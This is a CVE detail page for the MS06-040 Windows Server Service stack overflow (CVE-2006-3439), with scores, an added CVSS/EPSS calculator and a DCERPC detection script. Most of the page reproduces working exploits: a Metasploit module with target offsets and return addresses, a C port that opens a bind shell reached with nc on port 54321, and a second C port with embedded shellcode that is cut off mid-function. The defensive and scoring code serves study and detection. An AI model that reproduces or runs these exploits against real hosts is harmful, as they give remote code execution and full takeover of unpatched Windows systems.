CVE-2006-3439 : Detail

CVE-2006-3439

87.5%V4
Network
2006-08-08
23h00 +00:00
2018-10-12
17h57 +00:00

CVE description

Buffer overflow in the Server Service in Microsoft Windows 2000 SP4, XP SP1 and SP2, and Server 2003 SP1 allows remote attackers, including anonymous users, to execute arbitrary code via a crafted RPC message, a different vulnerability than CVE-2006-1314.

CVE information

Metrics

Metric   Score   Severity   CVSS vector                   Source
V2       10                 AV:N/AC:L/Au:N/C:C/I:C/A:C    nvd@nist.gov

EPSS

EPSS is a scoring model that predicts the likelihood that a vulnerability will be exploited.

EPSS score

The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that the vulnerability will be exploited.

EPSS percentile

The percentile is used to rank CVEs by their EPSS score. For example, a CVE in the 95th percentile by EPSS score is more likely to be exploited than 95% of all other CVEs. The percentile therefore compares one CVE's EPSS score with the scores of the other CVEs.
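
As an added illustration (not part of this page's tooling or of FIRST's or NVD's code), the Python below reproduces the score in the metrics table from its CVSS v2 vector using the v2 base-score equation, maps it to the NVD v2 severity band, and ranks a constructed EPSS sample the way the percentile paragraph describes. The EPSS population is made up, and the percentile convention (share of CVEs scored at or below the given one) is an assumption about FIRST's exact definition.

```python
"""Reproduce the metrics above: CVSS v2 base score from its vector, NVD severity band, EPSS percentile."""

# CVSS v2 base-metric weights from the CVSS v2 specification
AV = {"L": 0.395, "A": 0.646, "N": 1.0}       # access vector
AC = {"H": 0.35, "M": 0.61, "L": 0.71}        # access complexity
AU = {"M": 0.45, "S": 0.56, "N": 0.704}       # authentication
CIA = {"N": 0.0, "P": 0.275, "C": 0.660}      # confidentiality / integrity / availability impact


def parse_cvss2_vector(vector: str) -> dict:
    """Split 'AV:N/AC:L/Au:N/C:C/I:C/A:C' into its six base metrics."""
    metrics = dict(part.split(":", 1) for part in vector.split("/"))
    if set(metrics) != {"AV", "AC", "Au", "C", "I", "A"}:
        raise ValueError(f"not a CVSS v2 base vector: {vector}")
    return metrics


def cvss2_base_score(vector: str) -> float:
    """CVSS v2 base score equation; yields 10.0 for the vector in the metrics table."""
    m = parse_cvss2_vector(vector)
    impact = 10.41 * (1 - (1 - CIA[m["C"]]) * (1 - CIA[m["I"]]) * (1 - CIA[m["A"]]))
    exploitability = 20 * AV[m["AV"]] * AC[m["AC"]] * AU[m["Au"]]
    if impact == 0:            # f(Impact) = 0 when there is no impact at all
        return 0.0
    return round((0.6 * impact + 0.4 * exploitability - 1.5) * 1.176, 1)


def cvss2_severity(score: float) -> str:
    """NVD severity bands for CVSS v2: Low 0-3.9, Medium 4.0-6.9, High 7.0-10.0."""
    if score >= 7.0:
        return "HIGH"
    return "MEDIUM" if score >= 4.0 else "LOW"


def epss_percentile(cve: str, scores: dict) -> float:
    """Share (0..1) of the scored population with an EPSS score at or below this CVE's score.

    Assumption: this 'at or below' convention approximates FIRST's percentile definition.
    """
    mine = scores[cve]
    return sum(1 for s in scores.values() if s <= mine) / len(scores)


# Constructed sample population; these scores are made up, not FIRST data
SAMPLE_EPSS = {
    "CVE-SAMPLE-1": 0.002,
    "CVE-SAMPLE-2": 0.010,
    "CVE-SAMPLE-3": 0.045,
    "CVE-SAMPLE-4": 0.310,
    "CVE-SAMPLE-5": 0.970,
}


def triage(cve: str, vector: str, scores: dict) -> dict:
    """Combine the static CVSS v2 rating with the EPSS rank for one CVE."""
    score = cvss2_base_score(vector)
    return {"cve": cve, "cvss2": score, "severity": cvss2_severity(score),
            "epss": scores[cve], "epss_percentile": epss_percentile(cve, scores)}


if __name__ == "__main__":
    # The vector from the metrics table, paired with a constructed EPSS entry
    print(triage("CVE-SAMPLE-4", "AV:N/AC:L/Au:N/C:C/I:C/A:C", SAMPLE_EPSS))
```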

Exploit information

Exploit Database EDB-ID : 16367

Publication date : 2011-02-16 23h00 +00:00
Author : Metasploit
EDB verified : Yes

##
# $Id: ms06_040_netapi.rb 11762 2011-02-17 03:56:15Z jduck $
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
  Rank = GreatRanking

  include Msf::Exploit::Remote::DCERPC
  include Msf::Exploit::Remote::SMB

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Microsoft Server Service NetpwPathCanonicalize Overflow',
      'Description'    => %q{
          This module exploits a stack buffer overflow in the NetApi32
        CanonicalizePathName() function using the NetpwPathCanonicalize RPC
        call in the Server Service. It is likely that other RPC calls could
        be used to exploit this service. This exploit will result in a denial
        of service on Windows XP SP2 or Windows 2003 SP1. A failed exploit
        attempt will likely result in a complete reboot on Windows 2000 and
        the termination of all SMB-related services on Windows XP. The default
        target for this exploit should succeed on Windows NT 4.0, Windows 2000
        SP0-SP4+, Windows XP SP0-SP1 and Windows 2003 SP0.
      },
      'Author'         => [ 'hdm' ],
      'License'        => MSF_LICENSE,
      'Version'        => '$Revision: 11762 $',
      'References'     =>
        [
          [ 'CVE', '2006-3439' ],
          [ 'OSVDB', '27845' ],
          [ 'BID', '19409' ],
          [ 'MSB', 'MS06-040' ],
        ],
      'DefaultOptions' =>
        {
          'EXITFUNC' => 'thread',
        },
      'Privileged'     => true,
      'Payload'        =>
        {
          # Technically we can use more space than this, but by limiting it
          # to 370 bytes we can use the same request for all Windows SPs.
          'Space'           => 370,
          'BadChars'        => "\x00\x0a\x0d\x5c\x5f\x2f\x2e",
          'StackAdjustment' => -3500,
        },
      'Platform'       => 'win',
      'DefaultTarget'  => 0,
      'Targets'        =>
        [
          [ '(wcscpy) Automatic (NT 4.0, 2000 SP0-SP4, XP SP0-SP1)', { } ],
          [ '(wcscpy) Windows NT 4.0 / Windows 2000 SP0-SP4',
            { 'Offset' => 1000, 'Ret' => 0x00020804 }
          ],
          [ '(wcscpy) Windows XP SP0/SP1',
            { 'Offset' => 612, 'Ret' => 0x00020804 }
          ],
          [ '(stack) Windows XP SP1 English',
            {
              'OffsetA' => 656,
              'OffsetB' => 680,
              'Ret'     => 0x71ab1d54 # jmp esp @ ws2_32.dll
            }
          ],
          [ '(stack) Windows XP SP1 Italian',
            {
              'OffsetA' => 656,
              'OffsetB' => 680,
              'Ret'     => 0x71a37bfb # jmp esp @ ws2_32.dll
            }
          ],
          [ '(wcscpy) Windows 2003 SP0',
            { 'Offset' => 612, 'Ret' => 0x00020804 }
          ],
        ],
      'DisclosureDate' => 'Aug 8 2006'))

    register_options(
      [
        OptString.new('SMBPIPE', [ true, "The pipe name to use (BROWSER, SRVSVC)", 'BROWSER']),
      ], self.class)
  end

  def exploit
    connect()
    smb_login()

    mytarget = target
    if (not target) or (target.name =~ /Automatic/)
      case smb_peer_os()
      when 'Windows 5.0'
        print_status("Detected a Windows 2000 target")
        mytarget = targets[1]
      when 'Windows NT 4.0'
        print_status("Detected a Windows NT 4.0 target")
        mytarget = targets[1]
      when 'Windows 5.1'
        begin
          smb_create("\\SRVSVC")
          print_status("Detected a Windows XP SP0/SP1 target")
        rescue ::Rex::Proto::SMB::Exceptions::ErrorCode => e
          if (e.error_code == 0xc0000022)
            print_status("Windows XP SP2 is not exploitable")
            return
          end
          print_status("Detected a Windows XP target (unknown patch level)")
        end
        mytarget = targets[2]
      when /Windows Server 2003 (\d+)$/
        print_status("Detected a Windows 2003 SP0 target")
        mytarget = targets[5]
      when /Windows Server 2003 (\d+) Service Pack (\d+)/
        print_status("Windows 2003 SP#{$2} is not exploitable")
        return
      when /Samba/
        print_status("Samba is not vulnerable")
        return
      else
        print_status("No target detected for #{smb_peer_os()}/#{smb_peer_lm()}...")
        return
      end
    end

    # Specific fixups for Windows NT
    case smb_peer_os()
    when 'Windows NT 4.0'
      print_status("Adjusting the SMB/DCERPC parameters for Windows NT")
      datastore['SMB::pipe_write_min_size'] = 2048
      datastore['SMB::pipe_write_max_size'] = 4096
    end

    handle = dcerpc_handle(
      '4b324fc8-1670-01d3-1278-5a47bf6ee188', '3.0',
      'ncacn_np', ["\\#{datastore['SMBPIPE']}"]
    )
    print_status("Binding to #{handle} ...")
    dcerpc_bind(handle)
    print_status("Bound to #{handle} ...")

    #
    # /* Function 0x1f at 0x767e912c */
    # long function_1f (
    #   [in] [unique] [string] wchar_t * arg_00,
    #   [in] [string] wchar_t * arg_01,
    #   [out] [size_is(arg_03)] char * arg_02,
    #   [in] [range(0, 64000)] long arg_03,
    #   [in] [string] wchar_t * arg_04,
    #   [in,out] long * arg_05,
    #   [in] long arg_06
    # );
    #

    print_status("Building the stub data...")

    stub = ''

    case mytarget.name

    # This covers NT 4.0 as well
    when /wcscpy.*Windows 2000/
      code = make_nops(mytarget['Offset'] - payload.encoded.length) + payload.encoded
      path = code + ( [mytarget.ret].pack('V') * 16 ) + "\x00\x00"

      stub =
        NDR.long(rand(0xffffffff)) +
        NDR.UnicodeConformantVaryingString('') +
        NDR.UnicodeConformantVaryingStringPreBuilt(path) +
        NDR.long(rand(250)+1) +
        NDR.UnicodeConformantVaryingStringPreBuilt("\xeb\x02\x00\x00") +
        NDR.long(rand(250)+1) +
        NDR.long(0)

    when /wcscpy.*Windows XP/
      path =
        # Payload goes first
        payload.encoded +
        # Padding
        rand_text_alphanumeric(mytarget['Offset'] - payload.encoded.length) +
        # Land 6 bytes in to bypass garbage (XP SP0)
        [ mytarget.ret + 6 ].pack('V') +
        # Padding
        rand_text_alphanumeric(8) +
        # Address to write our shellcode (XP SP0)
        [ mytarget.ret ].pack('V') +
        # Padding
        rand_text_alphanumeric(32) +
        # Jump straight to shellcode (XP SP1)
        [ mytarget.ret ].pack('V') +
        # Padding
        rand_text_alphanumeric(8) +
        # Address to write our shellcode (XP SP1)
        [ mytarget.ret ].pack('V') +
        # Padding
        rand_text_alphanumeric(32) +
        # Terminate the path
        "\x00\x00"

      stub =
        NDR.long(rand(0xffffffff)) +
        NDR.UnicodeConformantVaryingString('') +
        NDR.UnicodeConformantVaryingStringPreBuilt(path) +
        NDR.long(rand(0xf0)+1) +
        NDR.UnicodeConformantVaryingString('') +
        NDR.long(rand(0xf0)+1) +
        NDR.long(0)

    when /stack/
      buff = rand_text_alphanumeric(800)
      buff[0, payload.encoded.length] = payload.encoded
      buff[ mytarget['OffsetA'], 4 ] = [mytarget.ret].pack('V')
      buff[ mytarget['OffsetB'], 5 ] = "\xe9" + [ (mytarget['OffsetA'] + 5) * -1 ].pack('V')

      path = "\\\x00\\\x00" + buff + "\x00\x00"

      stub =
        NDR.long(rand(0xffffffff)) +
        NDR.UnicodeConformantVaryingString('') +
        NDR.UnicodeConformantVaryingStringPreBuilt(path) +
        NDR.long(rand(0xf0)+1) +
        NDR.UnicodeConformantVaryingString('') +
        NDR.long(rand(0xf0)+1) +
        NDR.long(0)

    when /wcscpy.*Windows 2003/
      path =
        # Payload goes first
        payload.encoded +
        # Padding
        rand_text_alphanumeric(mytarget['Offset'] - payload.encoded.length) +
        # Padding
        rand_text_alphanumeric(32) +
        # The cookie is constant,
        # noticed by Nicolas Pouvesle in Misc #28
        "\x4e\xe6\x40\xbb" +
        # Padding
        rand_text_alphanumeric(4) +
        # Jump straight to shellcode
        [ mytarget.ret ].pack('V') +
        # Padding
        rand_text_alphanumeric(8) +
        # Address to write our shellcode
        [ mytarget.ret ].pack('V') +
        # Padding
        rand_text_alphanumeric(40) +
        # Terminate the path
        "\x00\x00"

      stub =
        NDR.long(rand(0xffffffff)) +
        NDR.UnicodeConformantVaryingString('') +
        NDR.UnicodeConformantVaryingStringPreBuilt(path) +
        NDR.long(rand(0xf0)+1) +
        NDR.UnicodeConformantVaryingString('') +
        NDR.long(rand(0xf0)+1) +
        NDR.long(0)
    end

    print_status("Calling the vulnerable function...")
    begin
      dcerpc.call(0x1f, stub, false)
      dcerpc.call(0x1f, stub, false)
    rescue Rex::Proto::DCERPC::Exceptions::NoResponse
    rescue => e
      if e.to_s !~ /STATUS_PIPE_DISCONNECTED/
        raise e
      end
    end

    # Cleanup
    handler
    disconnect
  end

end
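
As an added, defender-side example (not from the module above or from either C port further down), the Python below parses DCERPC v5 bind and request PDUs in the layout the C PoC's 72-byte bind stub uses, pulls the PathName argument (arg_01) out of the NDR stub described by the IDL comment above, and flags opnum 0x1f calls on the srvsvc interface whose path exceeds MAX_PATH. The PDUs it consumes are constructed inline; the MAX_PATH threshold and the absence of an authentication trailer are assumptions.

```python
"""Flag NetprPathCanonicalize (srvsvc opnum 0x1f) requests that carry an oversized path."""
import struct
import uuid

SRVSVC_UUID = "4b324fc8-1670-01d3-1278-5a47bf6ee188"  # Server Service interface bound by the exploits
NDR_SYNTAX = "8a885d04-1ceb-11c9-9fe8-08002b104860"   # NDR transfer syntax v2
OPNUM_NETPR_PATH_CANONICALIZE = 0x1f
PTYPE_REQUEST, PTYPE_BIND = 0x00, 0x0B
MAX_PATH = 260  # assumption: a legitimate PathName never exceeds MAX_PATH wide characters

# The 72-byte bind PDU from the C PoC on this page (DCERPC_Bind_RPC_Service), used to check the parser
PAGE_BIND_STUB = bytes.fromhex(
    "05000b03100000004800000000000000" "d016d016000000000100000000000100"
    "c84f324b7016d30112785a47bf6ee188" "03000000045d888aeb1cc9119fe80800"
    "2b10486002000000")


def dcerpc_header(ptype: int, body_len: int, call_id: int) -> bytes:
    """16-byte DCERPC v5 common header, little-endian data representation, flags first|last."""
    return struct.pack("<BBBB4sHHI", 5, 0, ptype, 0x03, b"\x10\x00\x00\x00", 16 + body_len, 0, call_id)


def ndr_wstring_encode(s: str) -> bytes:
    """NDR conformant varying wide string: max_count, offset, actual_count, UTF-16LE data, 4-byte pad."""
    data = (s + "\x00").encode("utf-16-le")
    n = len(data) // 2
    return struct.pack("<III", n, 0, n) + data + b"\x00" * (-len(data) % 4)


def ndr_wstring_decode(buf: bytes, off: int, endian: str) -> tuple:
    """Inverse of ndr_wstring_encode; returns (text without the NUL, offset of the next field)."""
    _max, _first, actual = struct.unpack_from(endian + "III", buf, off)
    off += 12
    n = 2 * actual
    text = buf[off:off + n].decode("utf-16-le", errors="replace").rstrip("\x00")
    return text, off + n + (-n % 4)


def build_bind(iface: str, call_id: int = 0) -> bytes:
    """Constructed bind with one presentation context (same layout as PAGE_BIND_STUB)."""
    ctx = struct.pack("<HBB", 0, 1, 0) + uuid.UUID(iface).bytes_le + struct.pack("<I", 3)
    ctx += uuid.UUID(NDR_SYNTAX).bytes_le + struct.pack("<I", 2)
    body = struct.pack("<HHIB3x", 5840, 5840, 0, 1) + ctx   # max_xmit, max_recv, assoc_group, n_ctx
    return dcerpc_header(PTYPE_BIND, len(body), call_id) + body


def build_canonicalize_request(path: str, call_id: int = 1) -> bytes:
    """Constructed opnum 0x1f request: ServerName, PathName, OutbufLen, Prefix, PathType, Flags."""
    stub = (struct.pack("<I", 0x20000) + ndr_wstring_encode("") + ndr_wstring_encode(path)
            + struct.pack("<I", 64) + ndr_wstring_encode("") + struct.pack("<II", 0, 0))
    body = struct.pack("<IHH", len(stub), 0, OPNUM_NETPR_PATH_CANONICALIZE) + stub
    return dcerpc_header(PTYPE_REQUEST, len(body), call_id) + body


def parse_pdu(pdu: bytes) -> dict:
    """Common header plus the bind interfaces or the request opnum and stub."""
    if len(pdu) < 16 or pdu[0] != 5:
        raise ValueError("not a DCERPC v5 PDU")
    endian = "<" if pdu[4] & 0x10 else ">"        # drep byte 0, bit 4: little-endian integers
    ptype, flags = pdu[2], pdu[3]
    frag_len, auth_len, call_id = struct.unpack(endian + "HHI", pdu[8:16])
    if frag_len != len(pdu):
        raise ValueError("frag_length does not match PDU size")
    info = {"ptype": ptype, "call_id": call_id, "endian": endian}
    if ptype == PTYPE_BIND:
        ifaces, off = [], 28                       # context items follow max_xmit/max_recv/assoc/n_ctx
        for _ in range(pdu[24]):
            ifaces.append(str(uuid.UUID(bytes_le=pdu[off + 4:off + 20])))
            off += 24 + 20 * pdu[off + 2]          # item header + abstract syntax, then transfer syntaxes
        info["interfaces"] = ifaces
    elif ptype == PTYPE_REQUEST:
        _hint, _ctx, info["opnum"] = struct.unpack(endian + "IHH", pdu[16:24])
        stub_start = 40 if flags & 0x80 else 24    # PFC_OBJECT_UUID adds a 16-byte object id
        info["stub"] = pdu[stub_start:frag_len - auth_len]  # assumption: no auth trailer
    return info


def canonicalize_path(stub: bytes, endian: str = "<") -> str:
    """Extract arg_01 (PathName) from a NetprPathCanonicalize stub laid out per the IDL above."""
    _server, off = ndr_wstring_decode(stub, 4, endian)   # skip the [unique] ServerName referent id
    path, _ = ndr_wstring_decode(stub, off, endian)
    return path


class Ms06040Detector:
    """Per-connection state: alert on oversized opnum 0x1f paths once srvsvc has been bound."""

    def __init__(self):
        self.srvsvc_bound = False
        self.alerts = []   # (call_id, path length in wide chars) for each flagged request

    def feed(self, pdu: bytes) -> int:
        """Consume one PDU; return the running alert count."""
        info = parse_pdu(pdu)
        if info["ptype"] == PTYPE_BIND and SRVSVC_UUID in info["interfaces"]:
            self.srvsvc_bound = True
        elif (self.srvsvc_bound and info["ptype"] == PTYPE_REQUEST
              and info["opnum"] == OPNUM_NETPR_PATH_CANONICALIZE):
            length = len(canonicalize_path(info["stub"], info["endian"]))
            if length > MAX_PATH:
                self.alerts.append((info["call_id"], length))
        return len(self.alerts)
```

Feed it the DCERPC fragments carried in SMB Write/Transact requests on the pipe; a bind followed by the two identical opnum 0x1f calls the module sends yields two alerts on one connection.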
Exploit Database EDB-ID : 2223

Publication date : 2006-08-18 22h00 +00:00
Author : Preddy
EDB verified : Yes

/*
 Microsoft Windows CanonicalizePathName() Remote Overflow MS06-040
 More info: http://www.microsoft.com/technet/security/bulletin/MS06-040.mspx

 Written by Preddy

 This is another version of hdm's metasploit version but ported to C,
 Works against Windows XP SP1
 And it should give a crash on Win2k in services.exe

 On successful exploitation it provides a remote shell at port 54321 of your victim:

 ./ms06 192.168.1.103
 Target: 192.168.1.103
 Attack Finished: now open a new terminal and nc to your victim on port 54321
 Warning: Don't close this window!

 [open a new terminal/window/prompt]
 nc 192.168.1.103 54321
 Microsoft Windows XP [Version 5.1.2600]
 (C) Copyright 1985-2001 Microsoft Corp.

 C:\WINDOWS\system32>

 http://www.team-rootshell.com

 Greetz to all of my friends at:
 FREENODE(irc.freenode.net): ##c,##linux,##php,##security,##slackware,#fluxbox,#perl,#remote-exploit,#tor
 MILW0RM(ABS.lcirc.net): #milw0rm
 STS(irc.smashthestack.org): #lecture,#social (special greetz to: esper and crystal)
 PTP(irc.eu.pulltheplug.org): #aso,#Social
 GSO(gso.eclipticx.net): #gso-chat
 TTNET(irc.ttnet.net.tr): #coders,#linux,#nukedx,#zion,#php
 SSTNET(irc.0x557.net): #darpa,#exploits,#m00,#ph4nt0m,#rx.rx,#segfault,#sscan
 Rootshell Security Group and everyone else ^^
*/

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <netdb.h>
#include <fcntl.h>
#include <signal.h>
#include <errno.h>
#include <unistd.h>
#include <stdarg.h>
#include <sys/mman.h>

#define PORT 139

/* peer0_0 .. peer0_14: the fifteen canned SMB/DCERPC packets that main() replays
   (raw hex byte arrays, payload included) are omitted here. */
int main(int argc, char **argv)
{
	int fd;
	int con;
	int repbf[20000];                 /* reply buffer */
	struct sockaddr_in target;

	if (argc < 2) {
		printf("Microsoft Windows CanonicalizePathName() Remote Exploit (MS06-040)\n");
		printf("Tested on WindowsXP SP1 EN and got a bindshell on port 54321\n");
		printf("Win2k should give a crash in services.exe\n");
		printf("I've used the default smbdomain: WORKGROUP\n\n");
		printf("Usage: %s <ip>\n", argv[0]);
		printf("Example: %s 192.168.1.103\n\n", argv[0]);
		printf("Written by: Preddy\n");
		printf("RootShell Security Group\n");
		printf("www.team-rootshell.com\n");
		exit(1);
	}

	fd = socket(AF_INET, SOCK_STREAM, 0);
	if (fd < 0) {
		perror("Could not create socket\n");
		exit(1);
	}

	printf("Target: %s\n", argv[1]);
	target.sin_family = AF_INET;
	target.sin_addr.s_addr = inet_addr(argv[1]);
	target.sin_port = htons(PORT);

	con = connect(fd, (struct sockaddr *)&target, sizeof(target));
	if (con < 0) {
		printf("Could not connect\n");
		exit(1);
	}

	/* replay the canned packets in order, reading one reply after each */
	sendto(fd, peer0_0, sizeof(peer0_0), 0, (struct sockaddr *)&target, sizeof(target));
	read(fd, repbf, sizeof(repbf));
	sendto(fd, peer0_1, sizeof(peer0_1), 0, (struct sockaddr *)&target, sizeof(target));
	read(fd, repbf, sizeof(repbf));
	sendto(fd, peer0_2, sizeof(peer0_2), 0, (struct sockaddr *)&target, sizeof(target));
	read(fd, repbf, sizeof(repbf));
	sendto(fd, peer0_3, sizeof(peer0_3), 0, (struct sockaddr *)&target, sizeof(target));
	read(fd, repbf, sizeof(repbf));
	sendto(fd, peer0_4, sizeof(peer0_4), 0, (struct sockaddr *)&target, sizeof(target));
	read(fd, repbf, sizeof(repbf));
	sendto(fd, peer0_5, sizeof(peer0_5), 0, (struct sockaddr *)&target, sizeof(target));
	read(fd, repbf, sizeof(repbf));
	sendto(fd, peer0_6, sizeof(peer0_6), 0, (struct sockaddr *)&target, sizeof(target));
	read(fd, repbf, sizeof(repbf));
	sendto(fd, peer0_7, sizeof(peer0_7), 0, (struct sockaddr *)&target, sizeof(target));
	read(fd, repbf, sizeof(repbf));
	sendto(fd, peer0_8, sizeof(peer0_8), 0, (struct sockaddr *)&target, sizeof(target));
	read(fd, repbf, sizeof(repbf));
	sendto(fd, peer0_9, sizeof(peer0_9), 0, (struct sockaddr *)&target, sizeof(target));
	read(fd, repbf, sizeof(repbf));
	sendto(fd, peer0_10, sizeof(peer0_10), 0, (struct sockaddr *)&target, sizeof(target));
	read(fd, repbf, sizeof(repbf));
	sendto(fd, peer0_11, sizeof(peer0_11), 0, (struct sockaddr *)&target, sizeof(target));
	read(fd, repbf, sizeof(repbf));
	sendto(fd, peer0_12, sizeof(peer0_12), 0, (struct sockaddr *)&target, sizeof(target));
	read(fd, repbf, sizeof(repbf));
	sendto(fd, peer0_13, sizeof(peer0_13), 0, (struct sockaddr *)&target, sizeof(target));
	read(fd, repbf, sizeof(repbf));
	sendto(fd, peer0_14, sizeof(peer0_14), 0, (struct sockaddr *)&target, sizeof(target));

	printf("Attack Finished: now open a new terminal and nc to your victim on port 54321\n");
	printf("Warning: Don't close this window!\n");
	read(fd, repbf, sizeof(repbf));
	printf("Done..\n");
	close(fd);
	return 0;
}

// milw0rm.com [2006-08-19]
Exploit Database EDB-ID: 2265

Publication date: 2006-08-27 22h00 +00:00
Author: ub3rst4r
EDB Verified: Yes

/*
 * MS06-040 Remote Code Execution Proof of Concept
 *
 * Ported by ub3r st4r aka iRP
 * ---------------------------------------------------------------------
 * Tested Against:
 *   Windows XP SP1
 *   Windows 2000 SP4
 *
 * Systems Affected:
 *   Microsoft Windows 2000 SP0-SP4
 *   Microsoft Windows XP SP0-SP1
 *   Microsoft Windows NT 4.0
 * ---------------------------------------------------------------------
 * This is provided as proof-of-concept code only for educational
 * purposes and testing by authorized individuals with permission
 * to do so.
 *
 * PRIVATE v.0.2 (08-27-06)
 */

#include <stdio.h>
#include <windows.h>

#pragma comment(lib, "mpr")
#pragma comment(lib, "Rpcrt4")

// bind uuid interface: 4b324fc8-1670-01d3-1278-5a47bf6ee188 v3.0
unsigned char DCERPC_Bind_RPC_Service[] =
"\x05\x00\x0B\x03\x10\x00\x00\x00\x48\x00\x00\x00\x00\x00\x00\x00"
"\xD0\x16\xD0\x16\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x01\x00"
"\xC8\x4F\x32\x4B\x70\x16\xD3\x01\x12\x78\x5A\x47\xBF\x6E\xE1\x88"
"\x03\x00\x00\x00\x04\x5D\x88\x8A\xEB\x1C\xC9\x11\x9F\xE8\x08\x00"
"\x2B\x10\x48\x60\x02\x00\x00\x00";

// request windows api: NetprPathCanonicalize (0x1f)
unsigned char DCERPC_Request_RPC_Service[] =
"\x05\x00\x00\x03\x10\x00\x00\x00\x30\x08\x00\x00\x00\x00\x00\x00"
"\x18\x08\x00\x00\x00\x00\x1f\x00\xff\xff\xff\xff\x01\x00\x00\x00"
"\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00";
// path ...
unsigned char DCERPC_Request_RPC_Service_[] =
"\xfa\x00\x00\x00\x02\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x00"
"\x00\x00\x00\x00\xfa\x00\x00\x00\x00\x00\x00\x00";

unsigned char sc[] =
"\x6a\x51\x59\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\xa8\x97\x90"
"\x88\x83\xeb\xfc\xe2\xf4\x29\x53\x6f\x67\x57\x68\xd4\x74\xc2\x7c"
"\xdd\x60\x51\x68\x6f\x77\xc8\x1c\xfc\xac\x8c\x1c\xd5\xb4\x23\xeb"
"\x95\xf0\xa9\x78\x1b\xc7\xb0\x1c\xcf\xa8\xa9\x7c\xd9\x03\x9c\x1c"
"\x91\x66\x99\x57\x09\x24\x2c\x57\xe4\x8f\x69\x5d\x9d\x89\x6a\x7c"
"\x64\xb3\xfc\xb3\xb8\xfd\x4d\x1c\xcf\xac\xa9\x7c\xf6\x03\xa4\xdc"
"\x1b\xd7\xb4\x96\x7b\x8b\x84\x1c\x19\xe4\x8c\x8b\xf1\x4b\x99\x4c"
"\xf4\x03\xeb\xa7\x1b\xc8\xa4\x1c\xe0\x94\x05\x1c\xd0\x80\xf6\xff"
"\x1e\xc6\xa6\x7b\xc0\x77\x7e\xf1\xc3\xee\xc0\xa4\xa2\xe0\xdf\xe4"
"\xa2\xd7\xfc\x68\x40\xe0\x63\x7a\x6c\xb3\xf8\x68\x46\xd7\x21\x72"
"\xf6\x09\x45\x9f\x92\xdd\xc2\x95\x6f\x58\xc0\x4e\x99\x7d\x05\xc0"
"\x6f\x5e\xfb\xc4\xc3\xdb\xfb\xd4\xc3\xcb\xfb\x68\x40\xee\xc0\x86"
"\xcc\xee\xfb\x1e\x71\x1d\xc0\x33\x8a\xf8\x6f\xc0\x6f\x5e\xc2\x87"
"\xc1\xdd\x57\x47\xf8\x2c\x05\xb9\x79\xdf\x57\x41\xc3\xdd\x57\x47"
"\xf8\x6d\xe1\x11\xd9\xdf\x57\x41\xc0\xdc\xfc\xc2\x6f\x58\x3b\xff"
"\x77\xf1\x6e\xee\xc7\x77\x7e\xc2\x6f\x58\xce\xfd\xf4\xee\xc0\xf4"
"\xfd\x01\x4d\xfd\xc0\xd1\x81\x5b\x19\x6f\xc2\xd3\x19\x6a\x99\x57"
"\x63\x22\x56\xd5\xbd\x76\xea\xbb\x03\x05\xd2\xaf\x3b\x23\x03\xff"
"\xe2\x76\x1b\x81\x6f\xfd\xec\x68\x46\xd3\xff\xc5\xc1\xd9\xf9\xfd"
"\x91\xd9\xf9\xc2\xc1\x77\x78\xff\x3d\x51\xad\x59\xc3\x77\x7e\xfd"
"\x6f\x77\x9f\x68\x40\x03\xff\x6b\x13\x4c\xcc\x68\x46\xda\x57\x47"
"\xf8\x67\x66\x77\xf0\xdb\x57\x41\x6f\x58";

int main(int argc, char* argv[])
{
    HANDLE hFile;
    NETRESOURCE nr;
    char szRemoteName[MAX_PATH], szPipePath[MAX_PATH];
    unsigned int i;
    unsigned char szInBuf[4096];
    unsigned long dwRead, nWritten;
    unsigned char szReqBuf[2096];

    if (argc < 3){
        printf("[-] Usage: ms06040poc <host> [target]\n");
        printf("\t1 - Windows 2000 SP0-SP4\n");
        printf("\t2 - Windows XP SP0-SP1\n");
        return -1;
    }

    memset(szReqBuf, 0, sizeof(szReqBuf));

    if (atoi(argv[2]) == 1) {
        unsigned char szBuff[1064];

        // build payload buffer
        memset(szBuff, '\x90', 1000);
        memcpy(szBuff+630, sc, sizeof(sc));
        for(i=1000; i<1064; i+=4) {
            memcpy(szBuff+i, "\x04\x08\x02\x00", 4);
        }

        // build request buffer
        memcpy(szReqBuf, DCERPC_Request_RPC_Service, sizeof(DCERPC_Request_RPC_Service)-1);
        memcpy(szReqBuf+44, "\x15\x02\x00\x00", 4);    /* max count */
        memcpy(szReqBuf+48, "\x00\x00\x00\x00", 4);    /* offset */
        memcpy(szReqBuf+52, "\x15\x02\x00\x00", 4);    /* actual count */
        memcpy(szReqBuf+56, szBuff, sizeof(szBuff));
        memcpy(szReqBuf+1120, "\x00\x00\x00\x00", 4);  /* align string */
        memcpy(szReqBuf+1124, DCERPC_Request_RPC_Service_, sizeof(DCERPC_Request_RPC_Service_)-1);
        memcpy(szReqBuf+1140 , "\xeb\x02", 2);
    }

    if (atoi(argv[2]) == 2) {
        unsigned char szBuff[708];

        memset(szBuff, '\x90', 612);                   /* size of shellcode */
        memcpy(szBuff, sc, sizeof(sc));
        memcpy(szBuff+612, "\x0a\x08\x02\x00", 4);
        memset(szBuff+616, 'A', 8);                    // 8 bytes padding
        memcpy(szBuff+624, "\x04\x08\x02\x00", 4);
        memset(szBuff+628, '\x90', 32);
        memcpy(szBuff+660, "\x04\x08\x02\x00", 4);
        memset(szBuff+664, 'B', 8);                    // 8 bytes padding
        memcpy(szBuff+672, "\x04\x08\x02\x00", 4);
        memset(szBuff+676, '\x90', 32);

        // build request buffer
        memcpy(szReqBuf, DCERPC_Request_RPC_Service, sizeof(DCERPC_Request_RPC_Service)-1);
        memcpy(szReqBuf+44, "\x63\x01\x00\x00", 4);    /* max count */
        memcpy(szReqBuf+48, "\x00\x00\x00\x00", 4);    /* offset */
        memcpy(szReqBuf+52, "\x63\x01\x00\x00", 4);    /* actual count */
        memcpy(szReqBuf+56, szBuff, sizeof(szBuff));
        memcpy(szReqBuf+764, "\x00\x00\x00\x00", 4);   /* align string */
